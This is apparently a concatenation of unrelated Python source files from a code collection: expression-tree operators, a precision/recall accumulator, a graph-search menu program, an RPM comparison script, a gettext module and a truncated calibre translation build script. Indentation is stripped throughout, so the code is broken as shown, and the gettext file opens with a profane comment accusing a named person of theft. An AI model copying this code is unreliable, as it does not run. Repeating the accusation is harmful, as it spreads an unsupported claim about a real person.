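# `binop` (a hypothetical parsed expression tree) to float64 in place.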
def is_term(obj):
return isinstance(obj, Term)
class BinOp(Op):
"""Hold a binary operator and its operands
Parameters
----------
op : str
left : Term or Op
right : Term or Op
"""
def __init__(self, op, lhs, rhs, **kwargs):
super(BinOp, self).__init__(op, (lhs, rhs))
self.lhs = lhs
self.rhs = rhs
self._disallow_scalar_only_bool_ops()
self.convert_values()
try:
self.func = _binary_ops_dict[op]
except KeyError:
# has to be made a list for python3
keys = list(_binary_ops_dict.keys())
raise ValueError('Invalid binary operator {0!r}, valid'
' operators are {1}'.format(op, keys))
def __call__(self, env):
"""Recursively evaluate an expression in Python space.
Parameters
----------
env : Scope
Returns
-------
object
The result of an evaluated expression.
"""
# handle truediv
if self.op == '/' and env.scope['truediv']:
self.func = op.truediv
# recurse over the left/right nodes
left = self.lhs(env)
right = self.rhs(env)
return self.func(left, right)
def evaluate(self, env, engine, parser, term_type, eval_in_python):
"""Evaluate a binary operation *before* being passed to the engine.
Parameters
----------
env : Scope
engine : str
parser : str
term_type : type
eval_in_python : list
Returns
-------
term_type
The "pre-evaluated" expression as an instance of ``term_type``
"""
if engine == 'python':
res = self(env)
else:
# recurse over the left/right nodes
left = self.lhs.evaluate(env, engine=engine, parser=parser,
term_type=term_type,
eval_in_python=eval_in_python)
right = self.rhs.evaluate(env, engine=engine, parser=parser,
term_type=term_type,
eval_in_python=eval_in_python)
# base cases
if self.op in eval_in_python:
res = self.func(left.value, right.value)
else:
res = pd.eval(self, local_dict=env, engine=engine,
parser=parser)
name = env.add_tmp(res)
return term_type(name, env=env)
def convert_values(self):
"""Convert datetimes to a comparable value in an expression.
"""
def stringify(value):
if self.encoding is not None:
encoder = partial(com.pprint_thing_encoded,
encoding=self.encoding)
else:
encoder = com.pprint_thing
return encoder(value)
lhs, rhs = self.lhs, self.rhs
if is_term(lhs) and lhs.is_datetime and is_term(rhs) and rhs.isscalar:
v = rhs.value
if isinstance(v, (int, float)):
v = stringify(v)
v = pd.Timestamp(_ensure_decoded(v))
if v.tz is not None:
v = v.tz_convert('UTC')
self.rhs.update(v)
if is_term(rhs) and rhs.is_datetime and is_term(lhs) and lhs.isscalar:
v = lhs.value
if isinstance(v, (int, float)):
v = stringify(v)
v = pd.Timestamp(_ensure_decoded(v))
if v.tz is not None:
v = v.tz_convert('UTC')
self.lhs.update(v)
def _disallow_scalar_only_bool_ops(self):
if ((self.lhs.isscalar or self.rhs.isscalar) and
self.op in _bool_ops_dict and
(not (issubclass(self.rhs.return_type, (bool, np.bool_)) and
issubclass(self.lhs.return_type, (bool, np.bool_))))):
raise NotImplementedError("cannot evaluate scalar only bool ops")
def isnumeric(dtype):
return issubclass(np.dtype(dtype).type, np.number)
class Div(BinOp):
"""Div operator to special case casting.
Parameters
----------
lhs, rhs : Term or Op
The Terms or Ops in the ``/`` expression.
truediv : bool
Whether or not to use true division. With Python 3 this happens
regardless of the value of ``truediv``.
"""
def __init__(self, lhs, rhs, truediv, *args, **kwargs):
super(Div, self).__init__('/', lhs, rhs, *args, **kwargs)
if not isnumeric(lhs.return_type) or not isnumeric(rhs.return_type):
raise TypeError("unsupported operand type(s) for {0}:"
" '{1}' and '{2}'".format(self.op,
lhs.return_type,
rhs.return_type))
if truediv or PY3:
_cast_inplace(com.flatten(self), np.float_)
_unary_ops_syms = '+', '-', '~', 'not'
_unary_ops_funcs = op.pos, op.neg, op.invert, op.invert
_unary_ops_dict = dict(zip(_unary_ops_syms, _unary_ops_funcs))
class UnaryOp(Op):
"""Hold a unary operator and its operands
Parameters
----------
op : str
The token used to represent the operator.
operand : Term or Op
The Term or Op operand to the operator.
Raises
------
ValueError
* If no function associated with the passed operator token is found.
"""
def __init__(self, op, operand):
super(UnaryOp, self).__init__(op, (operand,))
self.operand = operand
try:
self.func = _unary_ops_dict[op]
except KeyError:
raise ValueError('Invalid unary operator {0!r}, valid operators '
'are {1}'.format(op, _unary_ops_syms))
def __call__(self, env):
operand = self.operand(env)
return self.func(operand)
def __unicode__(self):
return com.pprint_thing('{0}({1})'.format(self.op, self.operand))
@property
def return_type(self):
operand = self.operand
if operand.return_type == np.dtype('bool'):
return np.dtype('bool')
if (isinstance(operand, Op) and
(operand.op in _cmp_ops_dict or operand.op in _bool_ops_dict)):
return np.dtype('bool')
return np.dtype('int')
class MathCall(Op):
def __init__(self, func, args):
super(MathCall, self).__init__(func.name, args)
self.func = func
def __call__(self, env):
operands = [op(env) for op in self.operands]
return self.func.func(*operands)
def __unicode__(self):
operands = map(str, self.operands)
return com.pprint_thing('{0}({1})'.format(self.op, ','.join(operands)))
class FuncNode(object):
def __init__(self, name):
if name not in _mathops:
raise ValueError(
"\"{0}\" is not a supported function".format(name))
self.name = name
self.func = getattr(np, name)
def __call__(self, *args):
return MathCall(self, args)
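# Illustrative sketch (names are hypothetical): FuncNode looks up a numpy ufunc
# by name and, when called with operand terms, builds a MathCall node that is
# evaluated later against a Scope:
#   sin_call = FuncNode('sin')(some_term)   # MathCall node
#   result = sin_call(env)                  # np.sin(some_term(env))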
| gpl-2.0 | 6,329,813,673,056,946,000 | 27.727444 | 79 | 0.543676 | false |
MathGaron/mean_average_precision | mean_average_precision/ap_accumulator.py | 1 | 1262 | """
Simple accumulator class that keeps track of True positive, False positive and False negative
to compute precision and recall of a certain class
"""
class APAccumulator:
def __init__(self):
self.TP, self.FP, self.FN = 0, 0, 0
def inc_good_prediction(self, value=1):
self.TP += value
def inc_bad_prediction(self, value=1):
self.FP += value
def inc_not_predicted(self, value=1):
self.FN += value
@property
def precision(self):
total_predicted = self.TP + self.FP
if total_predicted == 0:
total_gt = self.TP + self.FN
if total_gt == 0:
return 1.
else:
return 0.
return float(self.TP) / total_predicted
@property
def recall(self):
total_gt = self.TP + self.FN
if total_gt == 0:
return 1.
return float(self.TP) / total_gt
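    # Illustrative usage with hypothetical counts:
    #   acc = APAccumulator()
    #   acc.inc_good_prediction(8)    # 8 true positives
    #   acc.inc_bad_prediction(2)     # 2 false positives
    #   acc.inc_not_predicted(4)      # 4 ground truths never predicted
    #   acc.precision                 # 8 / 10 = 0.8
    #   acc.recall                    # 8 / 12 ~= 0.667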
def __str__(self):
str = ""
str += "True positives : {}\n".format(self.TP)
str += "False positives : {}\n".format(self.FP)
str += "False Negatives : {}\n".format(self.FN)
str += "Precision : {}\n".format(self.precision)
str += "Recall : {}\n".format(self.recall)
return str | mit | 3,655,848,321,890,244,000 | 27.066667 | 97 | 0.543582 | false |
AugustoLD/SearchAlgorithms-IA | graph_search.py | 1 | 4000 | #*************************************************************************
# Copyright (C) 2015
#
# Augusto Lopez Dantas - [email protected]
# Daniel Yang Chow - [email protected]
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#*************************************************************************
import sys
from graph_file import GraphFile
from a_star import AStar
from dijkstra import Dijkstra
graph_file = None
graph = {}
heuristic = {}
begin = None
end = None
def setup(filename):
global graph_file, graph, begin, end, heuristic
graph_file = GraphFile()
while not graph_file.read_file(filename):
filename = str(input("New file path: ")).rstrip()
graph = graph_file.construct_graph()
heuristic = graph_file.construct_heuristic_table()
begin = graph_file.begin
end = graph_file.end
def alter_graph_file():
new_file = str(input('New file path: ')).rstrip()
setup(new_file)
def alter_end():
global end, heuristic
target = str(input('New target node: '))
if target in graph:
end = target
heuristic = graph_file.construct_heuristic_table(end)
else:
print('Error: Invalid node!')
input('Press Enter...')
def alter_begin():
global begin
start = str(input('New starting node: '))
if start in graph:
begin = start
else:
print('Error: Invalid node!')
input('Press Enter...')
def show_graph():
graph_file.print_graph(graph)
input('Press Enter...')
def show_heuristic():
if graph_file.is_heuristic_complete(heuristic):
graph_file.print_heuristic(heuristic, end)
else:
print('Error: heuristic is incomplete for the target {}!'.format(end))
input('Press Enter...')
def run_a_star():
if graph_file.is_heuristic_complete(heuristic):
AStar(graph).search_path(begin, end, heuristic)
else:
print('Error: heuristic is incomplete for the target {}!'.format(end))
input('Press Enter...')
def run_dijkstra():
Dijkstra(graph).search_path(begin, end)
input('Press Enter...')
def run_search_algorithms():
menu = {
'1': run_dijkstra,
'2': run_a_star,
'3': alter_begin,
'4': alter_end
}
menu_opt = ""
while menu_opt != '0':
print('-'*70, '\n', 'Search Algorithms'.center(70))
print('-'*70)
print('1 - Dijkstra')
print('2 - A*')
print('3 - Change Starting Node (current: {})'.format(begin))
print('4 - Change Target Node (current: {})'.format(end))
print('0 - Back')
menu_opt = input()
if menu_opt in menu:
menu[menu_opt]()
def run():
menu = {
'1': run_search_algorithms,
'2': show_graph,
'3': show_heuristic,
'4': alter_graph_file
}
menu_opt = ""
while menu_opt != '0':
print('-'*70, '\n', 'Graph Search'.center(70))
print('-'*70)
print('1 - Run Search Algorithms')
print('2 - Show Graph')
print('3 - Show Heuristic Table')
print('4 - Change Graph File')
print('0 - Quit')
menu_opt = input()
if menu_opt in menu:
menu[menu_opt]()
if __name__ == '__main__':
try:
filename = sys.argv[1]
except IndexError:
filename = ""
setup(filename)
run()
| gpl-2.0 | 18,317,909,692,897,096 | 28.62963 | 78 | 0.59075 | false |
bluezd/pkg-build-tool | libpkgbuild/compareRPMRH.py | 1 | 2550 | #!/usr/bin/python
import os
from rpmUtils.miscutils import splitFilename
from library import Environment, CommandLineUI
class CompareRPMRH(Environment):
"""docstring for CompareRPMRH"""
def __init__(self):
super(CompareRPMRH, self).__init__()
self.ui = CommandLineUI(echoResponses=False)
self.actions = (
(">>> Would you like to modify the location of isoft rpm build dir(%s)?" %(self.rpm_build_dir),
" >>> Please specifiy the new location of rpm build dir: ",
"self.rpm_build_dir"),
(">>> Would you like to modify the location of RH CDROM dir(%s)?" %(self.rh_cdrom_dir),
" >>> Please specifiy the new location of RH CDROM dir: ",
"self.rh_cdrom_dir")
)
def run(self):
"""docstring for run"""
for action in self.actions:
answer = self.ui.promptConfirm(action[0])
if answer:
while True:
res = self.ui.prompt(action[1])
if os.path.exists(res):
if action[2] == "self.rpm_build_dir":
self.rpm_build_dir = res
elif action[2] == "self.rh_cdrom_dir":
self.rh_cdrom_dir = res
break
else:
print "!! %s does not exist, please input again !!" %(res)
os.system("clear")
if os.path.exists(self.rh_cdrom_dir) and \
os.path.exists(self.rpm_build_dir):
print "### Starting Verifying ###"
isoft_build_rpm_list = list()
not_build = False
for files in os.listdir(self.rpm_build_dir):
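                # splitFilename("foo-1.0-1.el7.x86_64.rpm") is expected to return
                # (name, version, release, epoch, arch); only name and arch are used here.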
(n, v, r, e, a) = splitFilename(files)
if a == self.arch and n not in isoft_build_rpm_list:
isoft_build_rpm_list.append(n)
for files in os.listdir(self.rh_cdrom_dir):
(n, v, r, e, a) = splitFilename(files)
if a == self.arch and n not in isoft_build_rpm_list:
not_build = True
print "### FAIL: %s Has Not Been Built ###" %(files)
if not not_build:
print "### PASS: All Arch Related RPMs Have Been Built ###"
else:
print "!! Error: file does not exist !!"
if __name__ == "__main__":
CompareRPMRH().run()
| apache-2.0 | 6,371,365,530,659,757,000 | 41.5 | 107 | 0.479608 | false |
DedMemez/ODS-August-2017 | gettext.py | 1 | 14996 | # Fuck you Disyer. Stealing my fucking paypal. GET FUCKED: gettext
import locale, copy, os, re, struct, sys
from errno import ENOENT
__all__ = ['NullTranslations',
'GNUTranslations',
'Catalog',
'find',
'translation',
'install',
'textdomain',
'bindtextdomain',
'dgettext',
'dngettext',
'gettext',
'ngettext']
_default_localedir = os.path.join(sys.prefix, 'share', 'locale')
def test(condition, true, false):
if condition:
return true
else:
return false
def c2py(plural):
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
import token, tokenize
tokens = tokenize.generate_tokens(StringIO(plural).readline)
try:
danger = [ x for x in tokens if x[0] == token.NAME and x[1] != 'n' ]
except tokenize.TokenError:
raise ValueError, 'plural forms expression error, maybe unbalanced parenthesis'
else:
if danger:
raise ValueError, 'plural forms expression could be dangerous'
plural = plural.replace('&&', ' and ')
plural = plural.replace('||', ' or ')
expr = re.compile('\\!([^=])')
plural = expr.sub(' not \\1', plural)
expr = re.compile('(.*?)\\?(.*?):(.*)')
def repl(x):
return 'test(%s, %s, %s)' % (x.group(1), x.group(2), expr.sub(repl, x.group(3)))
stack = ['']
for c in plural:
if c == '(':
stack.append('')
elif c == ')':
if len(stack) == 1:
raise ValueError, 'unbalanced parenthesis in plural form'
s = expr.sub(repl, stack.pop())
stack[-1] += '(%s)' % s
else:
stack[-1] += c
plural = expr.sub(repl, stack.pop())
return eval('lambda n: int(%s)' % plural)
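# Illustrative: a common Plural-Forms expression from .po headers compiles to a
# callable (the expression below is the usual Polish rule, shown only as an example):
#   f = c2py('n==1 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2')
#   f(1) -> 0, f(3) -> 1, f(5) -> 2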
def _expand_lang(locale):
from locale import normalize
locale = normalize(locale)
COMPONENT_CODESET = 1
COMPONENT_TERRITORY = 2
COMPONENT_MODIFIER = 4
mask = 0
pos = locale.find('@')
if pos >= 0:
modifier = locale[pos:]
locale = locale[:pos]
mask |= COMPONENT_MODIFIER
else:
modifier = ''
pos = locale.find('.')
if pos >= 0:
codeset = locale[pos:]
locale = locale[:pos]
mask |= COMPONENT_CODESET
else:
codeset = ''
pos = locale.find('_')
if pos >= 0:
territory = locale[pos:]
locale = locale[:pos]
mask |= COMPONENT_TERRITORY
else:
territory = ''
language = locale
ret = []
for i in range(mask + 1):
if not i & ~mask:
val = language
if i & COMPONENT_TERRITORY:
val += territory
if i & COMPONENT_CODESET:
val += codeset
if i & COMPONENT_MODIFIER:
val += modifier
ret.append(val)
ret.reverse()
return ret
class NullTranslations:
def __init__(self, fp = None):
self._info = {}
self._charset = None
self._output_charset = None
self._fallback = None
if fp is not None:
self._parse(fp)
return
def _parse(self, fp):
pass
def add_fallback(self, fallback):
if self._fallback:
self._fallback.add_fallback(fallback)
else:
self._fallback = fallback
def gettext(self, message):
if self._fallback:
return self._fallback.gettext(message)
return message
def lgettext(self, message):
if self._fallback:
return self._fallback.lgettext(message)
return message
def ngettext(self, msgid1, msgid2, n):
if self._fallback:
return self._fallback.ngettext(msgid1, msgid2, n)
elif n == 1:
return msgid1
else:
return msgid2
def lngettext(self, msgid1, msgid2, n):
if self._fallback:
return self._fallback.lngettext(msgid1, msgid2, n)
elif n == 1:
return msgid1
else:
return msgid2
def ugettext(self, message):
if self._fallback:
return self._fallback.ugettext(message)
return unicode(message)
def ungettext(self, msgid1, msgid2, n):
if self._fallback:
return self._fallback.ungettext(msgid1, msgid2, n)
elif n == 1:
return unicode(msgid1)
else:
return unicode(msgid2)
def info(self):
return self._info
def charset(self):
return self._charset
def output_charset(self):
return self._output_charset
def set_output_charset(self, charset):
self._output_charset = charset
def install(self, unicode = False, names = None):
import __builtin__
__builtin__.__dict__['_'] = unicode and self.ugettext or self.gettext
if hasattr(names, '__contains__'):
if 'gettext' in names:
__builtin__.__dict__['gettext'] = __builtin__.__dict__['_']
if 'ngettext' in names:
__builtin__.__dict__['ngettext'] = unicode and self.ungettext or self.ngettext
if 'lgettext' in names:
__builtin__.__dict__['lgettext'] = self.lgettext
if 'lngettext' in names:
__builtin__.__dict__['lngettext'] = self.lngettext
class GNUTranslations(NullTranslations):
LE_MAGIC = 2500072158L
BE_MAGIC = 3725722773L
def _parse(self, fp):
unpack = struct.unpack
filename = getattr(fp, 'name', '')
self._catalog = catalog = {}
self.plural = lambda n: int(n != 1)
buf = fp.read()
buflen = len(buf)
magic = unpack('<I', buf[:4])[0]
if magic == self.LE_MAGIC:
version, msgcount, masteridx, transidx = unpack('<4I', buf[4:20])
ii = '<II'
elif magic == self.BE_MAGIC:
version, msgcount, masteridx, transidx = unpack('>4I', buf[4:20])
ii = '>II'
else:
raise IOError(0, 'Bad magic number', filename)
for i in xrange(0, msgcount):
mlen, moff = unpack(ii, buf[masteridx:masteridx + 8])
mend = moff + mlen
tlen, toff = unpack(ii, buf[transidx:transidx + 8])
tend = toff + tlen
if mend < buflen and tend < buflen:
msg = buf[moff:mend]
tmsg = buf[toff:tend]
else:
raise IOError(0, 'File is corrupt', filename)
if mlen == 0:
lastk = k = None
for item in tmsg.splitlines():
item = item.strip()
if not item:
continue
if ':' in item:
k, v = item.split(':', 1)
k = k.strip().lower()
v = v.strip()
self._info[k] = v
lastk = k
elif lastk:
self._info[lastk] += '\n' + item
if k == 'content-type':
self._charset = v.split('charset=')[1]
elif k == 'plural-forms':
v = v.split(';')
plural = v[1].split('plural=')[1]
self.plural = c2py(plural)
if '\x00' in msg:
msgid1, msgid2 = msg.split('\x00')
tmsg = tmsg.split('\x00')
if self._charset:
msgid1 = unicode(msgid1, self._charset)
tmsg = [ unicode(x, self._charset) for x in tmsg ]
for i in range(len(tmsg)):
catalog[msgid1, i] = tmsg[i]
else:
if self._charset:
msg = unicode(msg, self._charset)
tmsg = unicode(tmsg, self._charset)
catalog[msg] = tmsg
masteridx += 8
transidx += 8
return
def gettext(self, message):
missing = object()
tmsg = self._catalog.get(message, missing)
if tmsg is missing:
if self._fallback:
return self._fallback.gettext(message)
return message
if self._output_charset:
return tmsg.encode(self._output_charset)
if self._charset:
return tmsg.encode(self._charset)
return tmsg
def lgettext(self, message):
missing = object()
tmsg = self._catalog.get(message, missing)
if tmsg is missing:
if self._fallback:
return self._fallback.lgettext(message)
return message
if self._output_charset:
return tmsg.encode(self._output_charset)
return tmsg.encode(locale.getpreferredencoding())
def ngettext(self, msgid1, msgid2, n):
try:
tmsg = self._catalog[msgid1, self.plural(n)]
if self._output_charset:
return tmsg.encode(self._output_charset)
if self._charset:
return tmsg.encode(self._charset)
return tmsg
except KeyError:
if self._fallback:
return self._fallback.ngettext(msgid1, msgid2, n)
elif n == 1:
return msgid1
else:
return msgid2
def lngettext(self, msgid1, msgid2, n):
try:
tmsg = self._catalog[msgid1, self.plural(n)]
if self._output_charset:
return tmsg.encode(self._output_charset)
return tmsg.encode(locale.getpreferredencoding())
except KeyError:
if self._fallback:
return self._fallback.lngettext(msgid1, msgid2, n)
elif n == 1:
return msgid1
else:
return msgid2
def ugettext(self, message):
missing = object()
tmsg = self._catalog.get(message, missing)
if tmsg is missing:
if self._fallback:
return self._fallback.ugettext(message)
return unicode(message)
return tmsg
def ungettext(self, msgid1, msgid2, n):
try:
tmsg = self._catalog[msgid1, self.plural(n)]
except KeyError:
if self._fallback:
return self._fallback.ungettext(msgid1, msgid2, n)
if n == 1:
tmsg = unicode(msgid1)
else:
tmsg = unicode(msgid2)
return tmsg
def find(domain, localedir = None, languages = None, all = 0):
if localedir is None:
localedir = _default_localedir
if languages is None:
languages = []
for envar in ('LANGUAGE', 'LC_ALL', 'LC_MESSAGES', 'LANG'):
val = os.environ.get(envar)
if val:
languages = val.split(':')
break
if 'C' not in languages:
languages.append('C')
nelangs = []
for lang in languages:
for nelang in _expand_lang(lang):
if nelang not in nelangs:
nelangs.append(nelang)
if all:
result = []
else:
result = None
for lang in nelangs:
if lang == 'C':
break
mofile = os.path.join(localedir, lang, 'LC_MESSAGES', '%s.mo' % domain)
if os.path.exists(mofile):
if all:
result.append(mofile)
else:
return mofile
return result
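# Illustrative: find('myapp', '/usr/share/locale', ['de_DE.UTF-8']) probes the
# expanded candidates (de_DE.UTF-8, de_DE, de.UTF-8, de) and returns the first
# existing .../<lang>/LC_MESSAGES/myapp.mo, or None; 'myapp' is a hypothetical domain.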
_translations = {}
def translation(domain, localedir = None, languages = None, class_ = None, fallback = False, codeset = None):
if class_ is None:
class_ = GNUTranslations
mofiles = find(domain, localedir, languages, all=1)
if not mofiles:
if fallback:
return NullTranslations()
raise IOError(ENOENT, 'No translation file found for domain', domain)
result = None
for mofile in mofiles:
key = (class_, os.path.abspath(mofile))
t = _translations.get(key)
if t is None:
with open(mofile, 'rb') as fp:
t = _translations.setdefault(key, class_(fp))
t = copy.copy(t)
if codeset:
t.set_output_charset(codeset)
if result is None:
result = t
else:
result.add_fallback(t)
return result
def install(domain, localedir = None, unicode = False, codeset = None, names = None):
t = translation(domain, localedir, fallback=True, codeset=codeset)
t.install(unicode, names)
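# Illustrative: install('myapp', '/usr/share/locale', unicode=True) builds a
# fallback-capable translation for the hypothetical 'myapp' domain and binds
# _() into __builtin__ for the whole process.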
_localedirs = {}
_localecodesets = {}
_current_domain = 'messages'
def textdomain(domain = None):
global _current_domain
if domain is not None:
_current_domain = domain
return _current_domain
def bindtextdomain(domain, localedir = None):
global _localedirs
if localedir is not None:
_localedirs[domain] = localedir
return _localedirs.get(domain, _default_localedir)
def bind_textdomain_codeset(domain, codeset = None):
global _localecodesets
if codeset is not None:
_localecodesets[domain] = codeset
return _localecodesets.get(domain)
def dgettext(domain, message):
try:
t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain))
except IOError:
return message
return t.gettext(message)
def ldgettext(domain, message):
try:
t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain))
except IOError:
return message
return t.lgettext(message)
def dngettext(domain, msgid1, msgid2, n):
try:
t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain))
except IOError:
if n == 1:
return msgid1
else:
return msgid2
return t.ngettext(msgid1, msgid2, n)
def ldngettext(domain, msgid1, msgid2, n):
try:
t = translation(domain, _localedirs.get(domain, None), codeset=_localecodesets.get(domain))
except IOError:
if n == 1:
return msgid1
else:
return msgid2
return t.lngettext(msgid1, msgid2, n)
def gettext(message):
return dgettext(_current_domain, message)
def lgettext(message):
return ldgettext(_current_domain, message)
def ngettext(msgid1, msgid2, n):
return dngettext(_current_domain, msgid1, msgid2, n)
def lngettext(msgid1, msgid2, n):
return ldngettext(_current_domain, msgid1, msgid2, n)
Catalog = translation | apache-2.0 | 4,187,896,059,054,283,300 | 28.29899 | 109 | 0.520339 | false |
yeyanchao/calibre | setup/translations.py | 1 | 11821 | #!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <[email protected]>'
__docformat__ = 'restructuredtext en'
import os, tempfile, shutil, subprocess, glob, re, time, textwrap
from functools import partial
from setup import Command, __appname__, __version__
def qt_sources():
qtdir = glob.glob('/usr/src/qt-*')[-1]
j = partial(os.path.join, qtdir)
return list(map(j, [
'src/gui/widgets/qdialogbuttonbox.cpp',
]))
class POT(Command): # {{{
description = 'Update the .pot translation template'
PATH = os.path.join(Command.SRC, __appname__, 'translations')
def source_files(self):
ans = []
for root, _, files in os.walk(os.path.dirname(self.PATH)):
for name in files:
if name.endswith('.py'):
ans.append(os.path.abspath(os.path.join(root, name)))
return ans
def get_tweaks_docs(self):
path = self.a(self.j(self.SRC, '..', 'resources', 'default_tweaks.py'))
with open(path, 'rb') as f:
raw = f.read().decode('utf-8')
msgs = []
lines = list(raw.splitlines())
for i, line in enumerate(lines):
if line.startswith('#:'):
msgs.append((i, line[2:].strip()))
j = i
block = []
while True:
j += 1
line = lines[j]
if not line.startswith('#'):
break
block.append(line[1:].strip())
if block:
msgs.append((i+1, '\n'.join(block)))
ans = []
for lineno, msg in msgs:
ans.append('#: %s:%d'%(path, lineno))
slash = unichr(92)
msg = msg.replace(slash, slash*2).replace('"', r'\"').replace('\n',
r'\n').replace('\r', r'\r').replace('\t', r'\t')
ans.append('msgid "%s"'%msg)
ans.append('msgstr ""')
ans.append('')
return '\n'.join(ans)
def run(self, opts):
pot_header = textwrap.dedent('''\
# Translation template file..
# Copyright (C) %(year)s Kovid Goyal
# Kovid Goyal <[email protected]>, %(year)s.
#
msgid ""
msgstr ""
"Project-Id-Version: %(appname)s %(version)s\\n"
"POT-Creation-Date: %(time)s\\n"
"PO-Revision-Date: %(time)s\\n"
"Last-Translator: Automatically generated\\n"
"Language-Team: LANGUAGE\\n"
"MIME-Version: 1.0\\n"
"Report-Msgid-Bugs-To: https://bugs.launchpad.net/calibre\\n"
"Plural-Forms: nplurals=INTEGER; plural=EXPRESSION;\\n"
"Content-Type: text/plain; charset=UTF-8\\n"
"Content-Transfer-Encoding: 8bit\\n"
''')%dict(appname=__appname__, version=__version__,
year=time.strftime('%Y'),
time=time.strftime('%Y-%m-%d %H:%M+%Z'))
files = self.source_files()
qt_inputs = qt_sources()
with tempfile.NamedTemporaryFile() as fl:
fl.write('\n'.join(files))
fl.flush()
out = tempfile.NamedTemporaryFile(suffix='.pot', delete=False)
out.close()
self.info('Creating translations template...')
subprocess.check_call(['xgettext', '-f', fl.name,
'--default-domain=calibre', '-o', out.name, '-L', 'Python',
'--from-code=UTF-8', '--sort-by-file', '--omit-header',
'--no-wrap', '-k__', '--add-comments=NOTE:',
])
subprocess.check_call(['xgettext', '-j',
'--default-domain=calibre', '-o', out.name,
'--from-code=UTF-8', '--sort-by-file', '--omit-header',
'--no-wrap', '-kQT_TRANSLATE_NOOP:2',
] + qt_inputs)
with open(out.name, 'rb') as f:
src = f.read()
os.remove(out.name)
src = pot_header + '\n' + src
src += '\n\n' + self.get_tweaks_docs()
pot = os.path.join(self.PATH, __appname__+'.pot')
with open(pot, 'wb') as f:
f.write(src)
self.info('Translations template:', os.path.abspath(pot))
return pot
# }}}
class Translations(POT): # {{{
description='''Compile the translations'''
DEST = os.path.join(os.path.dirname(POT.SRC), 'resources', 'localization',
'locales')
def po_files(self):
return glob.glob(os.path.join(self.PATH, '*.po'))
def mo_file(self, po_file):
locale = os.path.splitext(os.path.basename(po_file))[0]
return locale, os.path.join(self.DEST, locale, 'messages.mo')
def run(self, opts):
for f in self.po_files():
locale, dest = self.mo_file(f)
base = os.path.dirname(dest)
if not os.path.exists(base):
os.makedirs(base)
self.info('\tCompiling translations for', locale)
subprocess.check_call(['msgfmt', '-o', dest, f])
iscpo = {'bn':'bn_IN', 'zh_HK':'zh_CN'}.get(locale, locale)
iso639 = self.j(self.d(self.SRC), 'setup', 'iso_639',
'%s.po'%iscpo)
if os.path.exists(iso639):
dest = self.j(self.d(dest), 'iso639.mo')
if self.newer(dest, iso639):
self.info('\tCopying ISO 639 translations')
subprocess.check_call(['msgfmt', '-o', dest, iso639])
elif locale not in ('en_GB', 'en_CA', 'en_AU', 'si', 'ur', 'sc',
'ltg', 'nds', 'te', 'yi', 'fo', 'sq', 'ast', 'ml', 'ku',
'fr_CA', 'him', 'jv', 'ka'):
self.warn('No ISO 639 translations for locale:', locale)
self.write_stats()
self.freeze_locales()
def freeze_locales(self):
zf = self.DEST + '.zip'
from calibre import CurrentDir
from calibre.utils.zipfile import ZipFile, ZIP_DEFLATED
with ZipFile(zf, 'w', ZIP_DEFLATED) as zf:
with CurrentDir(self.DEST):
zf.add_dir('.')
shutil.rmtree(self.DEST)
@property
def stats(self):
return self.j(self.d(self.DEST), 'stats.pickle')
def get_stats(self, path):
return subprocess.Popen(['msgfmt', '--statistics', '-o', '/dev/null',
path],
stderr=subprocess.PIPE).stderr.read()
def write_stats(self):
files = self.po_files()
dest = self.stats
if not self.newer(dest, files):
return
self.info('Calculating translation statistics...')
raw = self.get_stats(self.j(self.PATH, 'calibre.pot'))
total = int(raw.split(',')[-1].strip().split()[0])
stats = {}
for f in files:
raw = self.get_stats(f)
trans = int(raw.split()[0])
locale = self.mo_file(f)[0]
stats[locale] = min(1.0, float(trans)/total)
import cPickle
cPickle.dump(stats, open(dest, 'wb'), -1)
def clean(self):
if os.path.exists(self.stats):
os.remove(self.stats)
for f in self.po_files():
l, d = self.mo_file(f)
i = self.j(self.d(d), 'iso639.mo')
j = self.j(self.d(d), 'qt.qm')
for x in (i, j, d):
if os.path.exists(x):
os.remove(x)
zf = self.DEST + '.zip'
if os.path.exists(zf):
os.remove(zf)
# }}}
class GetTranslations(Translations): # {{{
description = 'Get updated translations from Launchpad'
BRANCH = 'lp:~kovid/calibre/translations'
@property
def modified_translations(self):
raw = subprocess.Popen(['bzr', 'status', '-S', self.PATH],
stdout=subprocess.PIPE).stdout.read().strip()
ans = []
for line in raw.splitlines():
line = line.strip()
if line.startswith('M') and line.endswith('.po'):
ans.append(line.split()[-1])
return ans
def run(self, opts):
if not self.modified_translations:
subprocess.check_call(['bzr', 'merge', self.BRANCH])
self.check_for_errors()
if self.modified_translations:
subprocess.check_call(['bzr', 'commit', '-m',
'IGN:Updated translations'])
else:
print('No updated translations available')
def check_for_errors(self):
errors = os.path.join(tempfile.gettempdir(), 'calibre-translation-errors')
if os.path.exists(errors):
shutil.rmtree(errors)
os.mkdir(errors)
pofilter = ('pofilter', '-i', self.PATH, '-o', errors,
'-t', 'accelerators', '-t', 'escapes', '-t', 'variables',
#'-t', 'xmltags',
#'-t', 'brackets',
#'-t', 'emails',
#'-t', 'doublequoting',
#'-t', 'filepaths',
#'-t', 'numbers',
'-t', 'options',
#'-t', 'urls',
'-t', 'printf')
subprocess.check_call(pofilter)
errfiles = glob.glob(errors+os.sep+'*.po')
if errfiles:
subprocess.check_call(['gvim', '-f', '-p', '--']+errfiles)
for f in errfiles:
with open(f, 'r+b') as f:
raw = f.read()
raw = re.sub(r'# \(pofilter\).*', '', raw)
f.seek(0)
f.truncate()
f.write(raw)
subprocess.check_call(['pomerge', '-t', self.PATH, '-i', errors, '-o',
self.PATH])
return True
return False
# }}}
class ISO639(Command): # {{{
description = 'Compile translations for ISO 639 codes'
DEST = os.path.join(os.path.dirname(POT.SRC), 'resources', 'localization',
'iso639.pickle')
def run(self, opts):
